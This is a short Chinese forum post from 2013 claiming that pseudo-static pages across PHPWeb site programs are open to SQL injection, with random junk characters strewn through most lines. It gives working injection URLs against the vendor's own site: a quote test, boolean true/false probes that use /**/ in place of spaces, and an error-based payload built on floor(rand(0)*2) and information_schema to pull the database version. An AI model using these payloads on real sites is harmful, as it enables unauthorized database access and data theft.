phpweb所有的整站程序伪静态页面都存在sql注入+ I" ^+ Y- n: a( j5 Z7 d
5 _6 C7 N, S$ V: v主站:http://phpweb.net/
& a5 N, t! I! M/ t* \0 P7 X3 O* L5 N加’检测:
% _9 H# Y: |4 b ' B+ L" d' Z6 P0 S2 B" _
http://www.phpweb.net/down/html/?772′.html f( u% l/ v- |& G/ A' c
: U* Y$ q9 b$ _; w s
出错# |3 t9 Y/ r* g
存在注入。
* l) k( Z- J A* m% m! l+ t) P3 \不能用空格,只能用/*罗
# ?& q& ~% p0 }* xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
7 N- A; u# N9 }3 \) A
g# l/ N( X/ C" N" khttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.! `7 z9 T' I' g" y5 c+ ]0 H+ E
爆数据库版本:( ^" u+ p2 _+ a, }" i! r# m+ w
- u; d) U, T5 w?$ T, {. c# a, }* N
1: C/ _0 ?0 F3 m5 z( j9 D" Z
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
4 ] ?# N7 H# A8 S1 i' L, a: \更新日期: 2013-01-03 13:39:50 , @+ s- S# b! ?8 s4 b! C2 ~: l# A: G5 B
|
发表于 2013-1-4 19:46:42
收藏
支持
反对